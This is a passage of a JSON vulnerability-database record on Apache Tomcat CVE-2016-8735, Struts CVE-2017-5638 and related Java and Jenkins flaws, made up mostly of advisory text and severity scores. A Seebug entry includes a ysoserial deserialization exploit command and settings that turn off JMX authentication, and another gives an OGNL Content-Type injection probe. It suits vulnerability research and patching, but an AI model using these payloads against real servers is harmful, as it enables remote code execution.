["CVE-2016-3427"], "modified": "2023-10-05T00:00:00", "id": "AKB:C3CF0D9C-F7A6-43C6-802E-F6894C586B9A", "href": "https://attackerkb.com/topics/fZDiTmu5An/cve-2016-3427", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "redhatcve": [{"lastseen": "2022-03-12T12:01:08", "description": "The JmxRemoteLifecycleListener was not updated to take account of Oracle's fix for CVE-2016-3427. JMXRemoteLifecycleListener is only included in EWS 2.x and JWS 3.x source distributions. If you deploy a Tomcat instance built from source, using the EWS 2.x, or JWS 3.x distributions, an attacker could use this flaw to launch a remote code execution attack on your deployed instance.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2021-01-03T18:49:05", "type": "redhatcve", "title": "CVE-2016-8735", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427", "CVE-2016-8735"], "modified": "2022-03-12T09:44:30", "id": "RH:CVE-2016-8735", "href": "https://access.redhat.com/security/cve/cve-2016-8735", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-02T22:50:55", "description": "A flaw was reported in Apache Struts 2 that could allow an attacker to perform remote code execution with a malicious Content-Type value.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-03-08T11:53:37", "type": "redhatcve", "title": "CVE-2017-5638", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2020-08-18T15:11:09", "id": "RH:CVE-2017-5638", "href": "https://access.redhat.com/security/cve/cve-2017-5638", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T12:02:44", "description": "**Update 12/04** : the need to note that in conf/server,xml to increase the configuration, you need the catalina-jmx-remote. the jar and the groovy-2.3.9. jar package into lib directory And modify the CATALINA_OPTS\"-Dcom. sun. management. jmxremote. ssl=false-Dcom. sun. management. jmxremote. authenticate=false\"\n\nThe following details of the reference source: [0c0c0f](<https://mp.weixin.qq.com/s?__biz=MzAwMzI0MTMwOQ==&mid=2650173865&idx=1&sn=431e634a1350b070b54f9b5becd9a143&key=9ed31d4918c154c8af360e3955a9c76c2d28b7b700fce01b12fe1d3fe878a810323d81b26788da6aa2b6338bc6796969265d165d6a7384351359a6a75a1e5e68a3aeaa96554e3fedbc2e722d1637fcd8>)\n\nOracle fixes JmxRemoteLifecycleListener deserialization Vulnerability(CVE-2016-3427)\u3002 Tomcat also uses the JmxRemoteLifecycleListener this listener,but the Tomcat did not timely upgrade, so there is this remote code execution vulnerability.\n\nAffected version: Apache Tomcat 9.0.0. M1 to 9.0.0. M11 Apache Tomcat 8.5.0 to 8.5.6 Apache Tomcat 8.0.0. RC1 to 8.0.38 Apache Tomcat 7.0.0 to 7.0.72 Apache Tomcat 6.0.0 to 6.0.47\n\nNot affected version:\n\n * Upgrade to Apache Tomcat 9.0.0. M13 or later (Apache Tomcat 9.0.0. M12 has the fix but was not released)\n * Upgrade to Apache Tomcat 8.5.8 or later (Apache Tomcat 8.5.7 has the fix but was not released)\n * Upgrade to Apache Tomcat 8.0.39 or later\n * Upgrade to Apache Tomcat 7.0.73 or later\n * Upgrade to Apache Tomcat 6.0.48 or later\n\nUsage scenarios: Zabbix 2.0 has been the JMX monitoring added to the system, itself, is no longer dependent on third-party tools. This is on a Tomcat application and other Java application monitoring easier. Herein, a simple description Zabbix use JMX to monitor Tomcat process.\n\npoc: https://github.com/frohoff/ysoserial\n\ntomcat version 8. 0. 36\n\nconf/server. xml increase the configuration:\n\n\n\n\n\n`` F:\\HackTools\\EXP&gt;java-cp ysoserial-master-v0.0.4.jar ysoserial. exploit. RMIRegis tryExploit localhost 10001 Groovy1 calc.exe\n\n``\n\n\n\nPatch code:\n\nDiff of /tomcat/trunk/webapps/docs/changelog.xml `Parent Directory | Revision Log | Patch --- tomcat/trunk/webapps/docs/changelog.xml 2016/11/02 11:57:28 1767643 +++ tomcat/trunk/webapps/docs/changelog.xml 2016/11/02 11:57:36 1767644 @@ -97,6 +97,10 @@ StoreConfig component includes the executor name when writing the The Connector configuration. (markt) </fix> + <fix> + When configuring the JMX remote listener, specify the allowed types for + the credentials. (markt) + </fix> </changelog> </subsection>`\n\n/tomcat/trunk/java/org/apache/catalina/mbeans/JmxRemoteLifecycleListener.java `` Parent Directory | Revision Log | Patch \\--- tomcat/trunk/java/org/apache/catalina/mbeans/JmxRemoteLifecycleListener.java 2016/11/02 11:57:28 1767643 +++ tomcat/trunk/java/org/apache/catalina/mbeans/JmxRemoteLifecycleListener.java 2016/11/02 11:57:36 1767644 @@ -264,6 +264,10 @@ serverCsf = new RmiClientLocalhostSocketFactory(serverCsf); }\n\n * env. put(\"jmx. remote. rmi. server. credential. types\", new String[] {\n * String[]. class. getName(),\n * String. class. getName() }); \\+ // Populate the env properties used to create the server if (serverCsf != null) { env. put(RMIConnectorServer. RMI_CLIENT_SOCKET_FACTORY_ATTRIBUTE, serverCsf); @@ -328,7 +332,7 @@ cs = new RMIConnectorServer(serviceUrl, theEnv, server, The ManagementFactory. getPlatformMBeanServer()); cs. start();\n * registry. bind(\"jmxrmi\", server);\n * registry. bind(\"jmxrmi\", server. toStub()); log. info(sm. getString(\"jmxRemoteLifecycleListener. start\", Integer. toString(theRmiRegistryPort), Integer. toString(theRmiServerPort), serverName)); ``\n\nThis vulnerability, there are other use posture, the harm is huge, so to change the JMX password authentication is necessary now!\n", "cvss3": {}, "published": "2016-11-25T00:00:00", "type": "seebug", "title": "Apache Tomcat Remote Code Execution\uff08CVE-2016-8735\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-3427", "CVE-2016-8735"], "modified": "2016-11-25T00:00:00", "id": "SSV:92553", "href": "https://www.seebug.org/vuldb/ssvid-92553", "sourceData": "\n poc \u4ee3\u7801\u53c2\u89c1\uff1ahttps://github.com/frohoff/ysoserial\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-92553", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T12:05:43", "description": "It is possible to perform a RCE attack with a malicious Content-Disposition value or with improper Content-Length header. If the Content-Dispostion / Content-Length value is not valid an exception is thrown which is then used to display an error message to a user. This is a different vector for the same vulnerability described in [S2-045](https://cwiki.apache.org/confluence/display/WW/S2-045) (CVE-2017-5638).", "cvss3": {}, "published": "2017-03-21T00:00:00", "type": "seebug", "title": "S2-046: Struts 2 Remote Code Execution vulnerability\uff08CVE-2017-5638\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-21T00:00:00", "id": "SSV:92804", "href": "https://www.seebug.org/vuldb/ssvid-92804", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T12:01:16", "description": "Based on the Jakarta plugin plugin Struts remote code execution vulnerability, a malicious user can upload a file by modifying the HTTP request header Content-Type value to trigger the vulnerability, and then execute the system command.\n\nSound detection method(the detection method by the constant company): the In to the server to issue the http request packet, modify the Content-Type field: `Content-Type:%{#context['com. opensymphony. xwork2. dispatcher. HttpServletResponse']. addHeader('vul','vul')}. multipart/form-data`\n\nSuch as the return response packets in the presence of vul: the vul field entry then indicates the presence of vulnerability.\n", "cvss3": {}, "published": "2017-03-06T00:00:00", "type": "seebug", "title": "S2-045: Struts 2 Remote Code Execution vulnerability\uff08CVE-2017-5638\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-06T00:00:00", "id": "SSV:92746", "href": "https://www.seebug.org/vuldb/ssvid-92746", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cisa_kev": [{"lastseen": "2023-12-05T21:40:09", "description": "Apache Tomcat contains an unspecified vulnerability that allows for remote code execution if JmxRemoteLifecycleListener is used and an attacker can reach Java Management Extension (JMX) ports. This CVE exists because this listener wasn't updated for consistency with the Oracle patched issues for CVE-2016-3427 which affected credential types.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-05-12T00:00:00", "type": "cisa_kev", "title": "Apache Tomcat Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427", "CVE-2016-8735"], "modified": "2023-05-12T00:00:00", "id": "CISA-KEV-CVE-2016-8735", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T16:07:25", "description": "Jenkins User Interface (UI) contains an information disclosure vulnerability that allows users to see the names of jobs and builds otherwise inaccessible to them on the \"Fingerprints\" pages.", "cvss3": {}, "published": "2023-05-12T00:00:00", "type": "cisa_kev", "title": "Jenkins User Interface (UI) Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5317"], "modified": "2023-05-12T00:00:00", "id": "CISA-KEV-CVE-2015-5317", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-03T16:07:25", "description": "Apache Struts Jakarta Multipart parser allows for malicious file upload using the Content-Type value, leading to remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Apache Struts Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2017-5638", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-03T16:07:25", "description": "Oracle Java SE and JRockit contains an unspecified vulnerability that allows remote attackers to affect confidentiality, integrity, and availability via vectors related to Java Management Extensions (JMX). This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-05-12T00:00:00", "type": "cisa_kev", "title": "Oracle Java SE and JRockit Unspecified Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427"], "modified": "2023-05-12T00:00:00", "id": "CISA-KEV-CVE-2016-3427", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "prion": [{"lastseen": "2023-11-22T03:41:16", "description": "Remote code execution is possible with Apache Tomcat before 6.0.48, 7.x before 7.0.73, 8.x before 8.0.39, 8.5.x before 8.5.7, and 9.x before 9.0.0.M12 if JmxRemoteLifecycleListener is used and an attacker can reach JMX ports. The issue exists because this listener wasn't updated for consistency with the CVE-2016-3427 Oracle patch that affected credential types.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "source": "nvd@nist.gov", "type": "Primary", "impactScore": 5.9}, "published": "2017-04-06T21:59:00", "type": "prion", "title": "Remote code execution", "bulletinFamily": "NVD", "cvss2": {"baseSeverity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427", "CVE-2016-8735"], "modified": "2023-11-07T02:36:00", "id": "PRION:CVE-2016-8735", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2016-8735", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T03:52:32", "description": "The Fingerprints pages in Jenkins before 1.638 and LTS before 1.625.2 might allow remote attackers to obtain sensitive job and build name information via a direct request.", "cvss3": {}, "published": "2015-11-25T20:59:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5317"], "modified": "2019-12-17T17:41:00", "id": "PRION:CVE-2015-5317", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2015-5317", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-11-22T03:15:50", "description": "The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "source": "nvd@nist.gov", "type": "Primary", "impactScore": 6.0}, "published": "2017-03-11T02:59:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"baseSeverity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2021-02-24T12:15:00", "id": "PRION:CVE-2017-5638", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2017-5638", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-22T03:31:38", "description": "Unspecified vulnerability in Oracle Java SE 6u113, 7u99, and 8u77; Java SE Embedded 8u77; and JRockit R28.3.9 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to JMX.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "source": "nvd@nist.gov", "type": "Primary", "impactScore": 6.0}, "published": "2016-04-21T11:00:00", "type": "prion", "title": "Buffer overflow", "bulletinFamily": "NVD", "cvss2": {"baseSeverity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427"], "modified": "2023-11-07T02:32:00", "id": "PRION:CVE-2016-3427", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2016-3427", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "debiancve": [{"lastseen": "2023-12-05T22:31:16", "description": "Remote code execution is possible with Apache Tomcat before 6.0.48, 7.x before 7.0.73, 8.x before 8.0.39, 8.5.x before 8.5.7, and 9.x before 9.0.0.M12 if JmxRemoteLifecycleListener is used and an attacker can reach JMX ports. The issue exists because this listener wasn't updated for consistency with the CVE-2016-3427 Oracle patch that affected credential types.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-04-06T21:59:00", "type": "debiancve", "title": "CVE-2016-8735", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427", "CVE-2016-8735"], "modified": "2017-04-06T21:59:00", "id": "DEBIANCVE:CVE-2016-8735", "href": "https://security-tracker.debian.org/tracker/CVE-2016-8735", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T15:23:23", "description": "Unspecified vulnerability in Oracle Java SE 6u113, 7u99, and 8u77; Java SE Embedded 8u77; and JRockit R28.3.9 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to JMX.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2016-04-21T11:00:00", "type": "debiancve", "title": "CVE-2016-3427", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427"], "modified": "2016-04-21T11:00:00", "id": "DEBIANCVE:CVE-2016-3427", "href": "https://security-tracker.debian.org/tracker/CVE-2016-3427", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "tomcat": [{"lastseen": "2023-12-04T22:05:17", "description": "**Important: Remote Code Execution** [CVE-2016-8735](<https://vulners.com/cve/CVE-2016-8735>)\n\nThe *JmxRemoteLifecycleListener* was not updated to take account of Oracle's fix for [CVE-2016-3427](<https://vulners.com/cve/CVE-2016-3427>). Therefore, Tomcat installations using this listener remained vulnerable to a similar remote code execution vulnerability. This issue has been rated as important rather than critical due to the small number of installations using this listener and that it would be highly unusual for the JMX ports to be accessible to an attacker even when the listener is used.\n\nThis was fixed in revision [1767676](<https://svn.apache.org/viewvc?view=rev&rev=1767676>).\n\nThis issue was reported to the Apache Tomcat Security Team on 19 October 2016 and made public on 22 November 2016.\n\nAffects: 7.0.0 to 7.0.72\n\n**Important: Information Disclosure** [CVE-2016-6816](<https://vulners.com/cve/CVE-2016-6816>)\n\nThe code that parsed the HTTP request line permitted invalid characters. This could be exploited, in conjunction with a proxy that also permitted the invalid characters but with a different interpretation, to inject data into the HTTP response. By manipulating the HTTP response the attacker could poison a web-cache, perform an XSS attack and/or obtain sensitive information from requests other then their own.\n\nThis was fixed in revision [1767675](<https://svn.apache.org/viewvc?view=rev&rev=1767675>).\n\nThis issue was reported to the Apache Tomcat Security Team on 11 October 2016 and made public on 22 November 2016.\n\nAffects: 7.0.0 to 7.0.72", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-11-14T00:00:00", "type": "tomcat", "title": "Fixed in Apache Tomcat 7.0.73", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427", "CVE-2016-6816", "CVE-2016-8735"], "modified": "2016-11-14T00:00:00", "id": "TOMCAT:7FF5C8CC86A7AF5DA33F4B5874774B9B", "href": "https://tomcat.apache.org/security-7.html#Fixed_in_Apache_Tomcat_7.0.73", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-04T22:05:16", "description": "**Important: Remote Code Execution** [CVE-2016-8735](<https://vulners.com/cve/CVE-2016-8735>)\n\nThe *JmxRemoteLifecycleListener* was not updated to take account of Oracle's fix for [CVE-2016-3427](<https://vulners.com/cve/CVE-2016-3427>). Therefore, Tomcat installations using this listener remained vulnerable to a similar remote code execution vulnerability. This issue has been rated as important rather than critical due to the small number of installations using this listener and that it would be highly unusual for the JMX ports to be accessible to an attacker even when the listener is used.\n\nThis was fixed in revision [1767656](<https://svn.apache.org/viewvc?view=rev&rev=1767656>).\n\nThis issue was reported to the Apache Tomcat Security Team on 19 October 2016 and made public on 22 November 2016.\n\nAffects: 8.0.0.RC1 to 8.0.38\n\n**Important: Information Disclosure** [CVE-2016-6816](<https://vulners.com/cve/CVE-2016-6816>)\n\nThe code that parsed the HTTP request line permitted invalid characters. This could be exploited, in conjunction with a proxy that also permitted the invalid characters but with a different interpretation, to inject data into the HTTP response. By manipulating the HTTP response the attacker could poison a web-cache, perform an XSS attack and/or obtain sensitive information from requests other then their own.\n\nThis was fixed in revision [1767653](<https://svn.apache.org/viewvc?view=rev&rev=1767653>).\n\nThis issue was reported to the Apache Tomcat Security Team on 11 October 2016 and made public on 22 November 2016.\n\nAffects: 8.0.0.RC1 to 8.0.38", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": 